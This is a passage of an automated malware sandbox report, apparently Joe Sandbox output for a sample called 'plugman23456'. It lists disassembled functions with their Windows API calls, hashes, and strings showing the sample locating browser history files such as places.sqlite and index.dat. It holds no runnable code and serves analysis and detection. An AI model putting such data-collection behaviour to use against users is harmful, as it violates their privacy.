                          • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                          Function 00405220 Relevance: 4.6, APIs: 3, Instructions: 88libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • _mbscpy.MSVCRT ref: 00405250
                          • _mbscat.MSVCRT ref: 0040525B
                          • GetProcAddress.KERNEL32(0045DBE0,0045E298,00000060,00000000), ref: 00405266
                            • Part of subcall function 00405211: GetProcAddress.KERNEL32(0045DBE0,?,00405282,00000000), ref: 00405217
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc$DirectorySystem_mbscat_mbscpymemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 966727022-0
                          • Opcode ID: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction ID: 606e4c6bb64acde45ccb9f726b040251bc13cbada001f714d968da5dd22dddd0
                          • Opcode Fuzzy Hash: aa271fa985e038ed7aa7a673401608462c82e67ac2ecc87e69baa60a0a084fe3
                          • Instruction Fuzzy Hash: 52212171A80F00DADA10BF769C4BB1F2694DF50715B10046FB158FA2D2EBBC95419A9D
                          Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                            • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                            • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                            • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                            • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                            • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                            • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                            • Part of subcall function 0040E01E: UnmapViewOfFile.KERNELBASE(00000000), ref: 0040E135
                            • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                          • CloseHandle.KERNELBASE(000000FF), ref: 0040E582
                            • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                            • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                            • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                          • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                          • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                            • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                            • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                            • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$Handle$Close$ProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                          • String ID:
                          • API String ID: 2722907921-0
                          • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                          • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                          • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                          Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                          • memset.MSVCRT ref: 00403A55
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                            • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                            • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                          • String ID: history.dat$places.sqlite
                          • API String ID: 3093078384-467022611
                          • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                          • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                          • GetLastError.KERNEL32 ref: 00417627
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLast$File$PointerRead
                          • String ID:
                          • API String ID: 839530781-0
                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FileFindFirst
                          • String ID: *.*$index.dat
                          • API String ID: 1974802433-2863569691
                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                          Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@mallocmemcpy
                          • String ID:
                          • API String ID: 3831604043-0
                          • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                          • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                          • GetLastError.KERNEL32 ref: 004175A2
                          • GetLastError.KERNEL32 ref: 004175A8
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLast$FilePointer
                          • String ID:
                          • API String ID: 1156039329-0
                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                          • CloseHandle.KERNEL32(00000000), ref: 0040A061
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Temp$DirectoryFileNamePathWindows
                          • String ID:
                          • API String ID: 1125800050-0
                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                          Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: CloseHandleSleep
                          • String ID: }A
                          • API String ID: 252777609-2138825249
                          • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                          • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                          • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: BINARY
                          • API String ID: 2221118986-907554435
                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp
                          • String ID: /stext
                          • API String ID: 2081463915-3817206916
                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                          Function 00409529 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,00000143,00000000,00000000,00000000,?,00409690,00000000,00408801,?,?,00000143,?,?,00000143), ref: 00409552
                          • CloseHandle.KERNELBASE(00000000), ref: 0040957A
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$??2@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 1023896661-0
                          • Opcode ID: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction ID: f35f9952f6e959c636c436af82c7d55a8b84e599ec35ab47be9645748316c481
                          • Opcode Fuzzy Hash: 517a28336922631f1c28e20ccf3750fd377d8614a795a490cf559f5829b7d7c1
                          • Instruction Fuzzy Hash: 0D11D671A00608BFCB129F2ACC8585F7BA5EF94350B14843FF415AB392DB75DE40CA58
                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                          • CloseHandle.KERNELBASE(?), ref: 0040CC98
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                          • String ID:
                          • API String ID: 2445788494-0
                          • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                          • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                          Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: malloc
                          • String ID: failed to allocate %u bytes of memory
                          • API String ID: 2803490479-1168259600
                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                          Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcmpmemset
                          • String ID:
                          • API String ID: 1065087418-0
                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                          Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                          • CloseHandle.KERNEL32(?), ref: 00410654
                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                          • String ID:
                          • API String ID: 1381354015-0
                          • Opcode ID: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                          • Opcode Fuzzy Hash: 8fbfc2f348dbe95ddd4b5a009659ef379d3a5d6a1ec684b3882d32b59d0f1ff8
                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                          Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                          Function 004136C0 Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                          Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$Time$CloseCompareCreateHandlememset
                          • String ID:
                          • API String ID: 2154303073-0
                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                          Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 3150196962-0
                          • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                          • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                          Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
